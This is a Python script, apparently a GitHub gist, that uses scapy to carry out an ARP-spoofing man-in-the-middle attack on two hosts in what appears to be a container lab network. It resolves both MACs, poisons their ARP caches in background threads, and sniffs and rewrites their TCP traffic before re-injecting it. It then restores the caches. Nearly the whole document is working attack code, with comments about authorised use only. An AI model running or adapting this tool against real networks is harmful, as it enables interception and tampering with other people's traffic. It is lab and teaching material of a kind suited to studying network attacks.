@viz-prakash
Created March 9, 2022 23:10
ARP example
#!/usr/bin/env python3
import concurrent.futures
import subprocess
from time import sleep
from scapy.all import *
# Lab addresses used by the example: A is the machine whose ARP cache is
# poisoned, B is the peer we impersonate towards it.  The 02:42:... MAC
# prefix and the 10.9.0.0/24 range look like a container-based lab network
# (assumption -- confirm against your own setup).  Only ever point this at a
# network you own or are explicitly authorised to test.
IP_A: str = "10.9.0.5"
MAC_A: str = "02:42:0a:09:00:05"
IP_B: str = "10.9.0.6"
MAC_B: str = "02:42:0a:09:00:06"
# MAC of the machine in the middle.  None of MAC_A/MAC_B/MAC_M is referenced
# by the functions below: the victims' MACs are resolved live by get_MAC(),
# and spoof() leaves hwsrc unset so scapy uses the sending interface's own.
MAC_M: str = "02:42:0a:09:00:69"
# Module-level stop flag shared between sniff()'s stop_filter (stop_now) and
# the spoofing threads; arp_spoofing() sets it to True once sniffing ends.
QUIT: bool = False
def stop_now(packet):
    """``stop_filter`` callback for scapy's ``sniff()``.

    The packet itself is irrelevant: sniffing stops as soon as the
    module-level ``QUIT`` flag has been flipped to True (done by
    arp_spoofing() after sniffing returns, or by whoever owns the flag).
    """
    del packet  # unused; only the shared flag decides
    return QUIT
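def get_MAC(ipaddr, iface="eth0", timeout=2):
    """Resolve *ipaddr* to a MAC address with a live ARP "who-has" request.

    Args:
        ipaddr: IPv4 address to resolve.
        iface: interface to send and receive on.  The original default was
            the typo ``"eht0"``, so any caller relying on the default failed;
            callers passing ``interface`` explicitly were unaffected.
        timeout: seconds to wait for replies before giving up, so a silent
            host cannot stall the caller indefinitely.

    Returns:
        The ``hwsrc`` of the first ARP reply, or ``None`` if nobody answered.
        ARP replies are unauthenticated: on a hostile LAN another spoofer can
        make this return whatever MAC it likes, so treat the result as
        untrusted input.
    """
    request = ARP(op="who-has", pdst=ipaddr)
    # retry=-5 is kept from the original; see scapy's sr() docs for the exact
    # semantics of a negative retry count (it re-sends, it does not abort).
    answered, _unanswered = sr(request, iface=iface, retry=-5,
                               timeout=timeout, verbose=0)
    if not answered:
        return None
    _sent, reply = answered[0]
    return reply.hwsrc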
def spoof(target_ip, target_mac, host, count=0):
    """Keep poisoning *target_ip*'s ARP cache until the module flag ``QUIT`` is set.

    Each iteration sends one unsolicited ARP reply ("is-at") stating that
    *host*'s IP lives at this machine's MAC.  ``hwsrc`` is deliberately left
    unset, which scapy fills with the sending interface's MAC by default --
    that substitution is what redirects the target's traffic for *host*
    through us.  Runs in a worker thread (see arp_spoofing()) and exits only
    when ``QUIT`` becomes True.

    Args:
        target_ip: IP whose ARP cache is being poisoned.
        target_mac: its MAC, so the bogus reply is unicast to it.
        host: the IP address we impersonate.
        count: only selects the inter-packet delay -- 1 s when > 0, else 2 s.
    """
    print("Starting the spoof...")
    # count never changes inside the loop, so the delay can be chosen once.
    delay = 1 if count > 0 else 2
    while not QUIT:
        reply = ARP(op="is-at", psrc=host, hwdst=target_mac, pdst=target_ip)
        sent = send(reply, verbose=False, return_packets=True)
        print("sent packet from hwsrc: {} {}".format(reply.hwsrc, repr(sent[0])))
        sleep(delay)
    print("Stopping spoof - {}".format(QUIT))
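def restore(target_ip, target_mac, host, host_mac, count=5, only_target=False):
    """Send correct ARP replies so the poisoned caches converge back to truth.

    Each round tells *target* the real MAC of *host* and -- unless
    only_target is set -- tells *host* the real MAC of *target*.  Here the
    real MACs are set explicitly in ``hwsrc``, unlike spoof().

    Bug fixed: the original ``continue`` in the only_target branch skipped
    both the ``sleep(1)`` and the ``count -= 1``, so ``only_target=True``
    looped forever and flooded the wire.  A negative *count* now sends
    nothing instead of looping forever as well.

    Args:
        target_ip / target_mac: the poisoned party and its real MAC.
        host / host_mac: the impersonated host and its real MAC.
        count: rounds to send; a few repeats one second apart give both
            caches a chance to overwrite the bogus entry.
        only_target: restore only the target's cache, not the host's.
    """
    print("Restoring the poisoned caches...")
    for _ in range(count):
        fix_target = ARP(op="is-at", hwsrc=host_mac, psrc=host,
                         hwdst=target_mac, pdst=target_ip)
        sent = send(fix_target, verbose=False, return_packets=True)
        print("sent packet from hwsrc: {} {}".format(fix_target.hwsrc, repr(sent[0])))
        if not only_target:
            fix_host = ARP(op="is-at", hwsrc=target_mac, psrc=target_ip,
                           hwdst=host_mac, pdst=host)
            sent = send(fix_host, verbose=False, return_packets=True)
            print("sent packet from hwsrc: {} {}".format(fix_host.hwsrc, repr(sent[0])))
        sleep(1)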
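def arp_spoofing(target, host, interface="eth0", only_target=False):
    """Poison *target* (and, unless only_target, *host*), relay/modify their
    traffic until sniffing stops, then put the ARP caches back.

    Flow: resolve both MACs with live ARP, start the spoofing thread(s),
    block in scapy's sniff() with ``sniff_modify`` as the per-packet hook,
    then flip ``QUIT``, wait for the spoofers to exit, and un-poison.

    Args:
        target: IP whose traffic towards *host* we want to intercept.
        host: the peer we impersonate towards the target.
        interface: interface used for ARP resolution, sniffing and sending.
        only_target: poison only the target's cache (one-directional MITM).

    Raises:
        RuntimeError: when either MAC cannot be resolved.  Previously a
            ``None`` MAC was interpolated straight into the BPF filter string.

    Fixes relative to the original:
      * ``QUIT`` is reset on entry, so a second call in the same process does
        not stop immediately;
      * non-IP/TCP frames from the target (ARP, ICMP, UDP -- all match the
        ``ether src`` filter) no longer kill the sniff() callback with an
        IndexError on ``packet[TCP]``;
      * the rewritten segment is re-sent as ``ip`` (which already carries the
        TCP layer) with its length/checksum fields cleared so scapy recomputes
        them; the original ``ip/tcp`` appended a second TCP copy and kept the
        stale on-wire checksums;
      * re-injection uses *interface* instead of a hard-coded "eth0";
      * restore() runs in a ``finally`` block after the spoof threads have
        actually stopped, so an exception or interrupt in sniff() no longer
        leaves the victims poisoned, and ``only_target`` is forwarded to it.
    """
    global QUIT
    QUIT = False

    target_MAC = get_MAC(target, interface)
    host_MAC = get_MAC(host, interface)
    print("Target's MAC: {}, Host's MAC: {}".format(target_MAC, host_MAC))
    if target_MAC is None or host_MAC is None:
        raise RuntimeError("could not resolve MAC for target={} host={} on {}".format(
            target, host, interface))

    def sniff_modify(packet):
        """Per-packet hook: re-address the frame towards its real peer.

        Frames from the target are expected to be TCP; they are rewritten to
        a fixed port pair (8000/56999) with the SAckOK option stripped and
        re-sent at layer 3 -- experiment-specific behaviour kept from the
        original.  Frames from the host are only re-addressed and re-sent at
        layer 2.  The 1 s pause per packet is inherited too.
        """
        print(repr(packet))
        sleep(1)
        # NOTE (from the original author): modification + injection did not
        # work without ip_forwarding enabled; root cause never determined.
        src = packet[Ether].src
        if src == target_MAC:
            if not (packet.haslayer(IP) and packet.haslayer(TCP)):
                # Filter is by Ethernet source only, so ARP/ICMP/UDP land here.
                print("skipping non-TCP frame from target")
                return
            packet[Ether].src = packet[Ether].dst
            packet[Ether].dst = host_MAC
            ip = packet[IP]
            tcp = packet[TCP]
            tcp.dport = 8000
            tcp.sport = 56999
            print(tcp.options)
            # SAckOK is dropped; every other option passes through unchanged.
            tcp.options = [opt for opt in tcp.options if opt[0] != 'SAckOK']
            # The parsed frame still carries the on-wire length/checksum
            # values and scapy only recomputes fields that are unset, so clear
            # them or the rewritten segment goes out with stale values.
            del ip.len
            del ip.chksum
            del tcp.dataofs
            del tcp.chksum
            # ``ip`` already holds ``tcp`` as its payload; ``ip/tcp`` would
            # append a second TCP copy after the existing payload.
            pkt = ip
            print("packet modified")
            print(repr(packet))
            send(pkt, iface=interface)
            print("sent....")
        elif src == host_MAC:
            packet[Ether].src = packet[Ether].dst
            packet[Ether].dst = target_MAC
            print("packet modified")
            print(repr(packet))
            sendp(packet, iface=interface)
            print("sent....")

    # Everything either party puts on the wire (not just IP), hence the
    # layer check inside sniff_modify.
    bpf = 'ether src {} or ether src {}'.format(target_MAC, host_MAC)

    executor = concurrent.futures.ThreadPoolExecutor(max_workers=5)
    spoofers = [executor.submit(spoof, target, target_MAC, host)]
    if not only_target:
        spoofers.append(executor.submit(spoof, host, host_MAC, target))
    try:
        sniff(iface=interface, filter=bpf, prn=sniff_modify, stop_filter=stop_now)
    finally:
        QUIT = True
        # Let the spoof loops notice QUIT before sending corrections, so no
        # late poison frame overtakes the restore packets.
        executor.shutdown(wait=True)
        for fut in spoofers:
            exc = fut.exception()
            if exc is not None:
                print("spoof thread failed: {!r}".format(exc))
        restore(target, target_MAC, host, host_MAC, only_target=only_target)
    print("Done!")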
if __name__ == "__main__":
    # Kernel IP forwarding is left disabled here.  The TODO in sniff_modify
    # records that injection "doesn't work" without it; if you enable it
    # programmatically, prefer the argument-list form over a shell string,
    # e.g. subprocess.run(["sysctl", "net.ipv4.ip_forward=1"], check=True),
    # and switch it back off when done.
    # scapy's raw sockets normally need root (or CAP_NET_RAW), and this must
    # only be run against a network you are authorised to test.
    arp_spoofing(target=IP_A,host=IP_B)